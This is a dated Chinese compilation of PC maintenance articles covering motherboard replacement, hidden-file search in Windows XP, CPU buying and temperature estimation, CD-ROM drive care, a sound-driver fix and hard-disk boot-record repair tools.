《一键清理系统垃圾》

一步一步教你升级主板

   一般来说，升级主板主要包括两个方面的升级，一是指对主板BIOS的升级，这类升级方式用得很普遍，也很容易掌握，但整个PC的性能没有多大的提高，只能说是对你的主板进行了优化和修正了原来的BUG；第二种方法就是直接更换新的主板，这种方法往往能使你的PC性能有较大提升，不过缺点就是花费大。由于第一种方法我们已经介绍过，这里就着重讲解第二种方法。
   不同的升级方法都能不同程度地提高PC的性能，但对于那些较老的PC来说，最好的升级方法是更换主板。一个配有高速CPU和充足RAM的新主板可以大幅度提高系统性能。对初级用户来说，这是较困难的，但对于那些喜欢摆弄机器的计算机爱好者来说(或者在一个熟悉计算机的朋友的帮助下)，这个过程不是特别困难。
   过去四年内生产的计算机大多是ATX主板。如果您想更换一个ATX主板，应该说有较大的选择余地，可以支持各种类型和速度的处理器。最好的升级方案是先选择您满意的CPU，再选择支持此CPU的主板。
   如果是老一些的PC，可能需要更换AT主板。请仔细查看相关手册，以确定PC机的主板类型。如果是AT类型的主板，可以考虑买一块带有电源的空的ATX主板(通常仅带有CPU和RAM)，然后再把机器中原有的设备和硬件卡转移到新的主板上。但是，请注意ISA槽是否够用，因为许多新的主板上的ISA槽都很少。
   升级主板的同时，也是升级其他组件的好机会，如硬盘或显示卡。当然，如我们以前提醒您的一样，在升级主板之前，不要忘了备份系统数据。

具体步骤：

第一步：拔掉硬件卡和各种连线
  关掉计算机，拔掉电源。拔下鼠标、键盘、显示器、打印机及其他外接连线(如USB)接口上的连线。打开机箱盖，仔细查看哪些组件需要从主板上拔下。多数情况下，您需要拔下硬盘以及其他连在主板上的设备。
  开始工作前，应带上防静电护腕，并把它连到一个接地的金属物体上。卸下固定硬件卡的螺丝，并小心地拔下这些硬件卡，将它们放到一个表面平整干净的工作台上，最好按您拆卸的顺序依次摆放。
  将每条拔出的数据线都分别缠上胶带，并记下它们原来的接口位置。拔下所有的电源插头、软驱数据线及EIDE数据线。记住连接Primary EIDE和Secondary EIDE接口(通常在接口上标记着A、B或1、2)的分别是哪条数据线。
  最后，拔下连在机箱前面板按钮的小连接头和LED线。

第二步：卸下原来的主板
  多数主板是用几个螺丝固定在机箱上的，但不同机器螺丝数目不同。找到这些螺丝，小心卸下来，并将其放在一起，防止丢失。
  把主板稍向机箱前面滑动再往上拔就可以把它卸下来了。

第三步：安装内存和CPU
  在把新的主板装到机箱中之前，应把内存条插到主板的内存插槽中，从标有“Bank 0”的插槽开始插。DIMM内存槽只允许内存以一种方式插入。将内存条正确并牢固地安插在内存槽中后，内存槽两边的小卡子会自动抓住内存，并把它固定好。
   现在多数CPU都是Socket标准的。安装Socket类型的CPU时，应撬开Socket上的杠杆，小心地插入CPU，确保CPU的1号针插在了Socket插槽的1号针上。把CPU固定好并把杠杆锁紧。如果是需要插入到Slot插槽的老式CPU，应仔细插入直到固定好。
   提醒: 所有的CPU都需要有降温装置，如果没有内置风扇或是降温片，应该买一个装上，否则您的CPU几分钟之内就会烧毁。

第四步：安装新主板
  把新主板滑动放入机箱内的正确位置。您可以通过观察主板与机箱上的紧固螺丝插孔是否对齐来确认主板的位置是否正确。
  用螺丝把主板固定，但不要过紧，螺丝拧的太紧会破坏主板。

第五步：重新安装硬卡和电线
  把卸下的连线和硬件卡重新装回主板，这个过程一定要仔细，千万不要把针弄弯。再仔细检查每一个部件都已正确连接，硬件卡已用螺丝拧紧。
  注意: 不要忘记将CPU风扇的电源线连到主板上。
  重新连接鼠标、键盘、显示器、打印机和其他所需设备。在您确认所有事情都完成以后，就可以盖上机箱盖。最后，插上电源线。

第六步：启动机器
  重新启动机器。启动过程中若发出“嘀嘀”声并在屏幕上显示提示信息，说明Windows启动过程中发现了新硬件。一般情况下，操作系统会自动重新配置，如果Windows自动重启了多次，那是正常现象。
  如果启动时无任何动静，或PC机在启动过程中锁死，应马上关掉PC，切断电源，重新检查所有连接，然后再启动机器。如果问题仍解决不了，应与主板制造商的技术支持人员联系。
  对很多经常摆弄机器的人来说，这些只是雕虫小技，不过对许多刚上路的菜鸟来说，在升级主板之前好好的参阅相关的书籍和说明书，这样可以使你少走弯路，避免不必要的损失。


隐藏文件搜索大法

《一键清理系统垃圾》

隐藏文件搜索大法

   为了安全起见，在默认情况下Windows XP是不搜索隐藏文件和文件夹的（即使设置了“显示所有文件和文件夹”也不行），但是我们可以通过以下两种方法达到目的。

1. 直接设置
   首先打开“资源管理器”，点击工具栏上的“搜索”按钮，在左边的“搜索助理”栏中点击“改变首选项”，系统会问你：“你想怎样使用搜索助理？”，点击中间的“改变文件和文件夹搜索行为”，然后选择“默认的文件和文件夹搜索行为”为“高级”确定即可。看到“更多高级选项”这一项，点击后会弹出很多高级选项，好了，还犹豫什么，赶快勾选“搜索隐藏的文件和文件夹”吧，如果还需要其他的选项（如“区分大小写”）也可以一并选中。

2. 修改注册表法
   如果你觉得上面的设置过于麻烦，也可以通过修改注册表的办法来达到。打开“注册表编辑器”并定位到“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer”分支，在右边的窗口中找到DWORD值“SearchHidden”并将其值设为“1”即可。


硬件常见问题集锦(2)

《一键清理系统垃圾》

硬件常见问题集锦(2)

    62,Q:什么样的 CPU 适合你?
    A:如今的 CPU 市场已经进入了又一个群雄逐鹿的战国时代，老牌劲旅 INTEL 和 AMD、VIA(主要是AMD)斗得不可开交，不停地推出更高主频的 CPU，价格却一降再降。目前 OEM 市场主要还是 INTEL 的天下，一个个打着 Intel inside 和采用 INTEL PentiumⅢ 处理器的电脑卖的如火如荼，可组装机市场 INTEL 就没有那么幸运了，自从 AMD 推出了 K6-2 以来，INTEL 的日子一天比一天那么难过，到了今天，这两家已经是半斤八两，各有千秋了。

    现在，供我们可选的 CPU 大体可分为高端和低端，坐阵 INTEL 高端的有最新的 Pentium4，coppermine 和 PⅢE 系列，AMD 那边主要是新速龙。低端市场 INTEL 的有 celeronII，AMD 则有 Duron。除了这几种 CPU还有许多 CPU 由于其性能介于其间，故不在此一一介绍。先说说 Pentium4，这是 INTEL 刚刚推出的新一代 CPU，仍为 32 位架构，搭配最新的 I850 芯片组和昂贵的 RAMBUS 内存，性能并未有质的变化，只因其全新的系统总线(400MHz)和极高的主频(目前有 1.4GHz 和 1.5GHz 两种)使其有了一个很好的卖点。coppermine，133MHz 系统总线，0.18μm 工艺，优秀的整数和符点运算，良好的兼容性，使其在不管是在 OEM 市场还是在组装机市场都是用户的首选，PⅢE 系列，它虽然只有 100MHz 的系统总线，但同样经过优化的 L2 cache，0.18μ 的工艺，但它的低外频为超频爱好者提供了一个很好的发挥舞台。新速龙是 AMD 继老 ATHLON 的成功后推出的 0.18μm,铝连接(以后要改为铜连接)，100MHz 的 EV6 总线(一种类于 DDR 的总线，性能等效于 INTEL 200MHz 的 P6 总线）使其具有比 INTEL 更高的外频，新速龙不但保留了 AMD CPU 一贯良好的整数运算和从 ATHLON 开始超过 INTEL 的符点运算和其优良的性价比在市场中赢得了不少赞誉，但偏高的发热量成为其超频的弊端。在低端市场 celeronII 是 INTEL 继 celeron A 系列推出的新一代 celeron CPU，它采用的是 coppermine 内核，128K 的全速 L2 cache，不高的价格，良好的兼容性在市场中卖的还不错。我们再来说说 AMD 的 Duron，Duron 其实是新速龙的一个简化版，略微的缩水使其在性能上依然超过 INTEL 的 celeronII(包括目前刚刚发布的 100MHz 外频 celeronII)，它极高的性价比成为低价入门电脑的首选，但过高的发热量如不及时排掉，就会造成系统的不稳定，和不能超频。以上说法仅工参考。
    63,Q:小心购买封装 CPU
    A:你买的是盒装 CPU 吗？小心你买的是后封装的！
什么是后封装？后封装就是有人先收购盒装 CPU 的包装盒和里面的说明书，再将散装的 CPU 装进去，最后塑封。目前最流行的就是将英特尔的 866、933、1G 的 CPU 后封装。还有部分“赛扬”也成为了谋取暴利的 JS(奸商)的宝贝。
他们的成本是多少呢？首先他们在市场里面收购说明书或外包装，通常是 2 元一本说明书。最终他们卖掉的价钱是要比原来的散装价格贵出 50元～100 元不等。可是成本才 2 元钱，最多加上他们的“包装费”。最令人可气的是由于这些奸商的所作所为，影响到正规的经销商不敢进盒装的 CPU。因为在价格上拼不过他们，干脆就不作赔钱买卖。结果市场上就有了这些无人与之竞争的后封装 CPU。
其实辨别这些后封装的 CPU 很简单，因为既然是人为操作，CPU 上的序列号和外包装上的当然不同，在你购买时要注意这个细节。
最后再说两句有关 AMD 的情况。倍受大家喜爱的“雷鸟”1G，最近开始缺货。据悉还会持续缺货状态。可能是暑期购机的增多导致缺货。如果你要装机，最好事先打电话咨询一下。(2001年7月)
    64,Q:如何自己计算 CPU 的温度?
    A:参看解答……

    如何自己计算 CPU 的温度?
第一步：你的CPU的输出功率多大？

    这儿我给出了部分AMD的Athlon的输出功率:

----------------------------------------------------------------------------
第二步:你的风扇的功率多大？

    你先看看你的处理器的C/W数值。越小越好，不过国内的杂牌风扇也就不好说了。

    可能很多人都不知道什么是C/W，我在这儿介绍一下C/W = Delta / CPU功率的瓦数，Delta = CPU温度-周围环境的温度，解释一下C/W:对每个CPU辐射的热量,风扇将通过C/W乘以瓦数加上周围环境的温度来冷却内核，比如，周围环境的温度为25 C, C/W为0.25 CPU是50W，这就意味这，CPU的温度高于周围环境的温度为50 x 0.25 = 12.5 C，或者说是37.5 C.。可见，越低的C/W,当然就越好了。

    第三步:计算

    取得C/W，然后加上机箱温度这样，不就得到了你的CPU的温度了吗？

    如果低于60度,你可以认为这个结果完全没问题，如果高于60度,你可能还要再调整一下计算结果。

    为什么是60度呢?

    AMD的技术说明指出70C是最大稳定工作温度. (90和95C是最高温度，超过了，你就祈祷不要把主板也烧了吧，反正你的CPU是肯定没就了的)。

    不过从我们的经验来看，AMD的处理器能够在70C下稳定工作非常让人怀疑。

    所以说，我们这儿取60C，只要低于60C，你的系统绝对是稳定的，按上面的方法算出的温度也是可靠的，不过如果超过了，那就说不准了。

    举几个例子说明一下步骤

    Example 1:

    一个1500Mhz工作在1.85V.的处理器，使用的是Millenium Glaciator风扇.而且打开了机箱运行，机箱温度为28C.

    查表，最大功率为86 w.

    计算: 86 w X .18 C/W = 15.5C + 28C = 43.5C.低于60,工作稳定.

    例2:

    一个1500Mhz工作在1.85V.的处理器，使用Thermaltake Super Orb风扇.关上机箱，机箱温度34C.

    计算：86 w X .35 C/W = 30C + 34C = 64C.系统可能不稳定.

    例3:

    一个1500Mhz工作在1.85V.的处理器，电脑放在一个很热没有空调的地方，比如武汉学生寝室，那么房间温度将超过30C,设机箱温度为40C。使用Swiftech MC-462A风扇。

    计算：86 wX .18 C/W = 15.5C = 40C = 55.5C.很危险，这可是使用了世界上最顶级的风扇呀，想想我们武汉的情况，机箱温度估计不止40C吧，风扇估计是什么杂牌的自己都不知道，想想你可怜的CPU，还要超频，我晕。

    例4:

    超频到1650Mhz工作在2.20V.系统崩溃,为什么？让我们算算，使用的是Alpha PAL6035风扇,机箱温度为25C.主板告诉我温度为50C,为什么死机？

    真的如主板所写的那样的温度吗？

    让我们算算：134 w X .37 C/W = 50C + 25C = 75C.不死才怪。

    希望大家掌握了这个方法，合理使用各位的CPU，不要烧了一块都不知道为什么。

     面对着不断膨胀的信息，越来越多的用户开始使用光盘来保存信息，于是光驱也跟着“火热”起来。目前，光驱已经成为个人计算机的标准配置，它为我们使用计算机带来了极大的方便，同时也是朋友们比较头疼的一个硬件。尽管光驱目前的价格不是很贵，但由于光驱是使用频率比较高的一个设备，而组成光驱的核心部件激光头在长时间使用后，经常出使光驱出现各种莫名其妙的故障，从而影响了工作效率。为了帮助各位用户高效地使用光驱，下面笔者就把自己在实践中，总结出来的一些使用经验整理成文，来供大家参考：
    1、要确保使用质量好的盘片
    一台光驱质量下降的决定因素取决于这台光驱经常都读什么样的光盘。质量不好的光盘，如盘片变形、表面严重划伤、污染以及盗版光盘等，在光驱内进行读取时，光学拾取头的物镜将不断地上下跳动和左右摆动，以保证激光束在高低不平和左右偏摆的信息轨迹上实现正确聚集和寻道，加重了系统的负担，加快了机械磨损。同时，为了减少光驱的磨损，延长光驱的使用寿命，不要经常用光驱来长时间播放VCD影碟，因为这样，电机与激光头就增加了工作时间，从而缩短了光驱的使用寿命。另外在关机时，如果劣质光盘留在离激光头很近的地方，那当电机转起来后很容易划伤光头。
    2、选择一个质量好的光驱
    俗话说“工欲善其器，必先利其器”。如果要想让光驱高效工作，那么我们必须确保选择一个质量好的光驱。因为质量好的光驱一般纠错能力较强，阅读盘片的速度较快，而且在读取数据的稳定性方面也比较突出。目前市场的主流光驱基本都是50X左右，虽然DVD-ROM光驱的价格已经很便宜了，但由于片源的问题已经其他因素市场的热度还不够。而且现在市场的光驱品牌很多，比较知名的光驱品牌有明基、Aopen、SONY、Philips、美达、阿帕奇、大白鲨、NEC等等数十种。光驱品牌的好坏，在一定程度就代表了光驱的性能。因为大厂家的技术和小厂家的技术差别，那简直一个是天上一个是地下。所以如果希望你的光驱能“益寿延年”的话，那么你就必须选择一款比较有名气的光驱，这样在技术还是服务方面都是比较周全的选择。
    3、让光驱处于32位的工作模式之下
    在实际使用光驱的过程中，如果由于不慎，例如病毒发作或者加载了某些实模式驱动程序等，光驱就有可能工作在MS－DOS兼容模式下，以致严重影响了两者的读写速度，此时就要设法恢复它们的32位工作模式。具体操作方法是：首先打开Config.sys文件，并删除其中的实模式驱动程序，然后打开“控制面板”窗口，在该窗口中依次单击“系统”/“性能”/“文件系统”/“疑难解答”，检查一下是否选取了“禁用32位保护模式的磁盘驱动程序”复选框。如果已经选取，取消它即可恢复32位工作模式；如果没有选取，则说明系统中的32位光驱驱动程序已经丢失或出现故障。这时我们可以在“控制面板”中，单击“系统”/“设备管理器”/“系统设备”/“即插即用BIOS”，选取“删除”按钮，并选择重新启动计算机。然后系统将自动运行“添加新硬件向导”，并重新为检测到的光驱安装驱动程序，从而可以恢复光驱的32位工作模式。
    4、要时常对光驱做清洁工作
    光驱出现读盘速度变慢或不读盘的故障，主要是激光头出现问题所致。除了激光头自身寿命有限的原因外，无孔不入的灰尘也是影响激光头寿命的主要因素。灰尘不仅影响激光头的读盘质量和寿命，还会影响光驱内部各机械部件的精度。所以保持光驱的清洁显得尤为重要。首先要尽可能保持室内的清洁，减少灰尘。接着要经常清洁光驱内部组件和激光头。对于光驱的机械部件一般使用棉签擦拭即可，而激光头的清洁有很高的危险性，稍不留意就会造成激光头的损坏，所以如果光驱在保修期内最好交由经销商处理。如果过了保修期也要找个有过拆卸光驱经验的人来指导。另外清洁激光头不能使用酒精和其他清洁剂，可以使用气囊对准激光头吹掉灰尘。
    5、让光驱处于通风的地方
    由于光驱在工作的过程中会产生相当的热量，如果散热不良，轻则阅读数据失败，重则机器会损伤，因此我们要把光驱放在一个通风良好的地方，来保持它具有良好的散热性，以便保证读取数据的成功率。
    6、在工作中不能移动光驱
    光驱是一种高精设备，工作时激光头在盘片表面的浮动高度只有几微米。当光驱处于读写状态时，一旦发生较大的震动，就可能造成激光头与盘片的撞击，导致损坏。所以不要搬动运行中的光驱。在光驱的安装、拆卸过程中应多加小心，光驱移动、运输时严禁磕碰，最好用泡沫或海绵包装保护一下，尽量减少震动。
    7、对光驱操作的动作要轻
    光驱的托盘托架机构非常单薄，因此在托盘上存取盘片时要小心，不能用力向下压盘，也不能用异物碰撞弹出的托架，否则托架会变形或断裂。在将托架缩回光驱内部时，一定要通过按键或命令由控制电路自动将托架收回，而不应用手强行将托架推回光驱内，以防托架机械损坏和内部装盘机构电气失灵。
    8、设置缓存来提高光驱的读写速度
    在每个光驱的外壳上可能都会标有倍速这个指标，但这个速度通常表示光驱在理想状况下可能达到的最大速度，而在实际的使用的过程中，光驱的读写速度可能还会受到电脑本身运行速度的制约。为此，我们只有通过对电脑的合理设置，来尽量使光驱达到理想值。其实，在这里我们可以通过设置缓存，来提高光驱的运行速度。通常光驱的缓存是厂家在生产的时候，就在光驱内部建立的“硬”缓存。但我们可以通过相关的光驱优化软件以及提速软件，来设法加大光驱的Cache提高数据传输效率。此外大家还可以在控制面板中的设备项里，把光驱的DMA打开这样光驱的速度就会加快。
    9、给光驱一个合适的“工作环境”
    由于光驱是一种比较娇气的电子设备，它怕剧烈震动、怕发热、怕灰尘以及静电，因此我们如果想要延长光驱的使用寿命，就应该让光驱处于一个合适的“工作环境”之中。首先我们在安装光驱时，尽量让光驱和与硬盘以及CPU离的远一点，以保证光驱能有良好的散热性。另外由于光驱的速度越来快，主轴电机的速度也在不断的提升，这就是为什么高速光驱发热量惊人的问题。在机箱里尽量给光驱以及其他发热量较大的设备，做好通风散热工作。还有，要让光驱处于没有灰尘的工作环境之中，用完电脑最好使用防尘罩来保护光驱不受灰尘侵袭。为了防止光驱在读写数据时产生噪音和震动，我们可以在安装光驱的5.25驱动器槽里放入一些如海绵之类的防震物品。
    10、快速查询光驱的运行速度
    如果我们想知道当前的光驱运行速度是多少时，可以在WINDOWS中的“系统信息”设置框中进行查询。具体步骤如下：首先用鼠标依次点击“开始”／“程序”／“附件”／“系统工具”／“系统信息”；接着打开光驱并放入一张光盘进去，随后我们再用鼠标单击“组件”中的“CD-ROM”，过一会儿，光驱的具体运行速度就出来了，在“传送速度”一栏中可以看到光驱运行速度的具体数值。一般情况下，我们可以通过这种方法来查询光驱的实际运行速度，而我们常说的光驱运行速度是指它的标称速度，例如标有“MAX40X”的光驱，是指光驱最高的运行速度是40X(约6000kbps的数据传送输率)，而并不是指光驱的即时运行速度。
    11、让光驱连接到PCI总线
    由于设备连接到PCI总线上时，可以获得较快的运行速度，因此我们可以使用硬件配置的方法，使光驱连接到PCI总线上，其配置的具体操作步骤是：打开“控制面板”窗口，在该窗口中用鼠标依次单击“系统”/“设备管理器”/“系统设备”/“PCI Bus”/“属性”/“设置”/“设备列举”/“使用硬件”。如果选定“使用硬件”之后某些设备无法正常工作，则可选择“使用BIOS”，但它有可能导致系统或设备停止响应。
    12、用完光盘要及时取出
    我们在不使用光驱时，尽量不要把光盘盘片放在驱动器内，一定要记住把它及时取出来，因为光驱要保持“一定的随即访问速度”，也就是说光驱在检测到托盘上装有盘片时，将控制光学拾取头对盘片进行正确的聚焦、驱动盘片以恒定的速度转动并正确寻道于盘片的信息轨迹，也就是说光驱所有的部件都在工作，时刻准备读取数据，所以不用时应及时将盘片从光驱内取出，以降低光驱机械系统的磨损、减少激光二极管的使用时间，延长光驱的使用寿命。
    13、保护好光盘涂层
    许多人都知道光盘在使用中激光束是从塑料面入射的，塑料面上的划伤、指印和灰尘会影响数据的读取，但塑料面的划伤通常可以通过误码纠正来补偿。相比之下，保护涂层却非常薄，一次轻微的摩擦都可能破坏它，并对数据造成致命的伤害。严格来说，铝膜层和保护层比塑料层更重要，更需要精心加以保护。而且，绝对不要在保护涂层上贴标签。因为当标签失去黏性翘起时，铝膜也会被粘起，光盘上保存的数据也同时被带走了。
    14、使用光驱刻录光盘时要关闭省电功能
    通常刻录一张光盘可能需要20到30分钟的时间，如果我们在刻录的过程中，启用了省电功能，就有可能导致计算机突然失去响应而停止工作，从而损坏盘片。要关闭省电功能，我们可以按照如下步骤去操作：首先用鼠标打开控制面板窗口，在其中找到电源管理图标，然后用鼠标双击该图标，打开电源管理窗口，在该窗口中将电源使用方案设为“始终打开”，而在“关闭监视器”及关闭硬盘“两个选项中均设为”从不“模式。接着重新启动计算机，进入到CMOS设置界面，在该界面中将Power Management中的Power Saving设置为NONE；最后保存CMOS设置，并退出重新启动计算机。
    15、保护好光盘的内缘
    光盘的数据存储方式与软盘不同，软盘最重要的是其外缘的0.1磁道，光盘的数据却是从内往外沿螺旋形顺序记录的。有经验的朋友可能知道，光盘靠近外缘的划痕大概只能使几幅图像无法正常显示，而在内缘的划痕会“枪毙”掉整张盘，因为内缘起始处记录着文件表上数据。
    16、单独使用一根数据线
    如果我们要使用光驱来刻录数据的话，为了保证刻录的成功率，我们应该让光驱单独使用一根IDE线和接口。有些用户的IDE设备可能比较多，往往将刻录光驱与其它IDE设备接在一个IDE接口或IDE线上，这样也会降低刻录的安全性，最好是将刻录光驱单独连结在一个单独的IDE线上，而且跳线也设成Master主跳线口。
    17、将大型软件直接复制到硬盘
    我们在安装大型软件或系统软件例如WIN98时，如果光驱不太好用，就会出现数据复制错误；又或者光驱行走速度太慢，以致安装过程漫长。此时，我们如果把光驱中的安装程序直接复制到硬盘中，然后直接在硬盘中进行安装软件的工作，就可以大大提高程序的安装速度。例如我们假设需要安装WIN98程序时，可以把光驱中的win98子目录直接拖放到硬盘的某个分区中，复制完成以后，直接用鼠标双击硬盘中的win98子目录，找到其中的setup安装文件，并执行该文件就可以开始程序的安装工作了，其后的过程将和用光驱安装一样。这样做的好处是：可以减少光驱读取数据的错误，安装速度也较用光驱快。如果你不在乎那100多兆空间，不妨将光盘中的文件都拷到硬盘中。当你日后要添加新硬件或驱动程序时，就不用翻箱倒柜找安装光盘了，系统会自动在你的硬盘中寻找所要的文件，方便得很。
    18、提高光驱纠错能力
    目前市面上流行的光驱运行速度是越来越快，但是光驱的运行速度与它的纠错能力是息息相关的，如果光驱的读写速度加快的话，那么它的纠错能力将会降低，因此我们可以这么说，提高光驱的运行速度是以牺牲纠错能力为代价的。因此，如果我们片面地追求读写速度的话，那么高速光驱将会对光盘盘片的质量有相当高的要求，如果盘片质量稍微差一点，光驱可能就会辨认不出来。相反，一些低速的光驱却能读到质量较差的碟的内容，特别是放VCD时，低速光驱尤胜高速光驱。当然，对于高速光驱，我们也可以通过设置的方法来改变高速光驱的纠错能力，我们只要在“控制面板”／“系统”“性能”／“文件系统”／“CD-ROM”选项中将光驱设置为倍速就可以了，但这种方法将会大大降低光驱的运行速度。
    19、多使用虚拟光驱
    目前有许多游戏软件都是光盘版的，一定要用光驱才能被正确使用。但我们如果经常使用光驱来玩游戏的话，那么光驱就会经常处于频繁的读写数据的状态之中，长期以往，光驱势必要受到磨损，从而大大缩短光驱的使用寿命。其实我们可以使用虚拟光驱软件在自己的硬盘里建立镜像文件，这样就可以让光驱好好歇一会。如果我们的硬盘容量很大的话，完全可以利用虚拟光驱软件将CD、VCD和光盘游戏虚拟到硬盘中，虚拟光驱不但速度比真正的光驱快许多，也可以延长光驱的寿命，何乐而不为呢。
    20、使用光驱护理软件来保护光驱
    要想提高光驱的使用寿命，正确地护理是必不可少的。目前有许多用户平时根本不注意光驱的正确使用，比如直接用手关闭仓门、在光盘高速旋转时出仓、关闭或重起计算机时不取出光盘等，这些不好的习惯直接影响光驱的使用寿命。为此，我们平时可以使用一些专用的光驱护理软件来保护光驱，例如我们可以使用“光驱护理2001”来保护光驱，该软件可以避免手动进仓、出仓给光驱带来的伤害，在弹出仓门时会自动延迟确保光盘完全停止旋转，而且具有CD播放、停止功能。
    21、不要强行开关盘盒
    由于光驱内所有部件都非常精密，如果我们强行来开关光驱的话，很可能就会损坏光驱内部的传动装置，甚至能改变内部光学系统的具体位置，从而影响光驱的正常工作，所以我们千万不能有这一不良习惯。目前无论哪种光驱，前面板上都有出盒与关盒按键，利用此按键是常规的正确开关光驱盘盒的方法。按键时手指不能用力过猛，以防按键失控。当然，我们最好能利用程序进行开关盘盒，在很多软件或多媒体播放工具中都有这样的功能。如在Windows中用鼠标右键单击光盘盘符，其弹出的菜单中也有一项“弹出”命令，可以弹出光盘盒。因此，笔者强烈建议大家尽量使用软件控制开、关盘盒，这样可减少光驱故障发生率。
    22、解决光驱挑盘或不读盘的方法
    挑盘或不读盘是光驱经常遇到的故障，造成此故障的原因很多，但主要是因为激光头老化或灰尘太多导致。光驱挑盘，问题主要出在光驱的压盘机构，部分光盘的盘片很薄，而光驱的设计是以标准盘片为基准的，光驱压盘机构夹不紧光盘，盘片在光驱里打滑，这样就造成光驱挑盘。解决的方法就是把光驱的压盘机构调的紧些，或加厚光盘。就是在光盘孔周围贴上不干胶，以增加压盘机构同盘片的接触。如果还是不行，就要调整激光头的发射功率了，不同品牌光驱的调节电位器的位置是不同的，但大部分在激光头的前侧面。在调节前先记住原来的位置，如果不行再调回来。光驱不读盘首先观察主导电机的工作情况，如果主导电机无动作，就要先检查主导电机的电源供给是否正常、电机的传动皮带是否打滑、断裂。状态开关是否开关自如，因为如果开关不到位，主导电机得不到启动信号也不能启动；光驱读盘主要是激光头的问题，一般来说清洁激光头后情况会有所改善。如果是激光头或其他元器件老化的原因除了更换没别的办法。
    23、不能让光驱长时间运行
    由于光驱在长时间处于高速旋转状态，这样既增加了激光头的工作时间，也使光驱内的电机及传动部件处于磨损状态，无形中缩短了光驱的寿命。为了能延长其寿命，我们最好能减少光驱的使用时间，在硬盘空间允许的情况下，我们可以把经常使用的光盘做成虚拟光盘存放在硬盘上。如教学软件、游戏软件等存放在硬盘中，这样以后可直接在硬盘上运行，并且具有速度快的特点。
    24、光驱在工作时不能突然关机
    当光驱开始工作时，一般都处于高速旋转之中，如果我们中途突然关闭电源，可能会导致光头与盘片猛烈磨擦而损坏盘片。因此最好不要突然关机，关机时一定要注意面板上的光驱指示灯是否还在闪烁，只有当光驱指示灯停止闪烁、光驱结束读写后方可关闭计算机的电源开关。

一、配置为杂牌815E主板/CeleronII1.2G/128M/40G，集成AC97声卡，我安装的系统是Win2000 SP2，在安装了主板芯片组驱动后，系统自动识别了声卡并能发声，但速度明显偏快，无论是wav、mp3还是midi都是这样；系统并无任何冲突。
二、查询说明书上说该主板的声卡型号可能是四种型号中的一种，并在光盘上提供了七八种驱动，仔细查看主板并未找到标有相似型号的芯片。没办法只好逐个安装实验。
三、尝试安装了几种驱动，有的是提示型号不对，有的是安装成功但效果和原来一样。安装到als201驱动时，声音终于完全正常了。
由此可见，声音变快是由于驱动程序不正确造成的。

硬盘软故障完全修复手册
维护工具篇

    俗话说：工欲善其事，必先利其器。我们平时应该熟练掌握几种硬盘维护工 具的使用方法，这样当遇到硬盘软故障时才不至于晕头转向、手忙脚乱。下面我 就硬盘的常见软故障简单介绍几种硬盘维护工具的使用方法。

    ★ 修复硬盘主引导记录 ★

    由于病毒的破坏或操作上的失误，使硬盘主引导记录和分区表损坏，硬盘将 无法启动。

    ① KV3000

    作为一款著名的杀毒软件，KV3000同样具有非常强大的主引导记录和分区修 复的功能。我们可以先用软盘启动后，执行KV3000，按下F6键，就可查看已经不 能引导的硬盘隐含扇区，即查看硬盘0面0柱1扇区主引导信息是否正常，如果在 硬盘的0面0柱1扇区，没有找到关键代码，即硬盘分区表关键代码“80”“55 AA ”，那么硬盘本身将不能引导，即使软盘引导后也不能进入硬盘。这时，可按动 翻页键PgDn或PgUp键，在硬盘的隐含扇区内查找，如有，会在表中出现闪动的红 色“80”和“55AA”，并响一声来提示你，下行会出现一行提示，“F9 = Save To Side 0 Cylinder 0 Sector 1 !!!”。这时，按一下“F9”键，就可将刚找 到的、即在表中显示出的原硬盘主引信息, 覆盖到硬盘0面0柱1扇区中，然后， 机器会重新引导硬盘，恢复硬盘的起动性能。

    ② FDISK

    用FDISK/MBR覆盖主引导记录的代码区，但不重建主分区表。适用于主引导 记录被引导区型病毒破坏或主引导记录代码丢失，但主分区表并未损坏的情况下 。注意：FDISK/MBR并不适用于清除所有引导型病毒，因此要慎用。

    ③ FIXMBR

    FIXMBR是专门用于重新构造主引导扇区的小工具，使用方法也简单。直接运 行FIXMBR的情况下它将检查MBR结构，如果发现系统不正常则会出现是否进行修 复的提示。如果回答“YES”，它将搜索分区。当搜索到相应的分区以后，系统 会提示是否修改MBR，回答“YES”则开始自动修复，如果搜索的结果不对，可使 用/Z开关符，重新启动系统将恢复到原来的状态。如果想详细了解FIXMBR的使用 方法，可以用/H开关来查看。

    ★ 修复硬盘分区表 ★

    ① KV3000

    在KV3000的主菜单上，按下F10键，就可对系统的有关参数和硬盘分区表快 速测试， 如果硬盘分区表不正常，KV3000会先将坏分区表保存到软盘上以防不 测，再自动重建硬盘分区表，使硬盘起死回生。

    但如果硬盘只有一个分区，而且文件分配表(FAT表)、文件目录表(ROOT表) 严重损坏，数据已经都没有了。那么，用这个功能即使恢复了C盘分区表，也不 能使C盘引导，数据也不能恢复。这时需要配合其它的硬盘修复工具来恢复数据 。如果硬盘还有D、E、...等几个分区，一般情况下，KV3000能找回后面没有被 破坏掉的分区，重建一个新的硬盘分区表，然后，再用DOS系统软盘引导机器后 ，就可进入硬盘后面几个分区，将数据备出后，再将硬盘重新分区、格式化。

    KV3000修复硬盘的详细使用方法，大家可以查看KV3000杀毒软件的使用说明 文件，也可以到江民网站去查看。

    ② FDISK

    用FDISK还可以新建立分区、重建主分区表，但这种方法不覆盖主引导记录 的代码区。如果要保证硬盘内数不受破坏，分区时必需与原来的分区相一致，否 则数据不保。具体的使用方法我就不哆嗦了，建议大家使用FDISK的汉化版，很 容易上手。

    ③ DiskMan

    DiskMan过人之处就在于它的硬盘分区表恢复功能，并采用图形界面，以图 表方式表示分区表的详细结构。使用方法详见《宝刀不老的小工具——DiskMan 》

    ★ 挽救硬盘FAT（文件分配表）和DIR（根目录表） ★

    如果FAT表损坏,就可能丢失所有文件，即便对DOS很精通的人，要修复FAT表 损坏的磁盘文件也不是件轻松的事情。

    ① NDD（Norton Utilities 8.0）

    启动NU工具包中的磁盘修复程序NDD，在其菜单中选择Options/General确认 NDD将进行包括主引导区和CMOS在内的全面检查，然后在主菜单中选择Diagnose Disk对硬盘进行诊断，NDD在发现错误时将会自动报告，并提示错误描述（ Description）和推荐意见（Recommendation），可以根据情况选择修复与否。 修复时注意保存UNDO磁盘，以便恢复操作之用。在修复过程中，尤其是在表面测 试（Surface Test）过程中如果提示读写错误，则说明硬盘存在物理损坏，数据 可能会丢失。

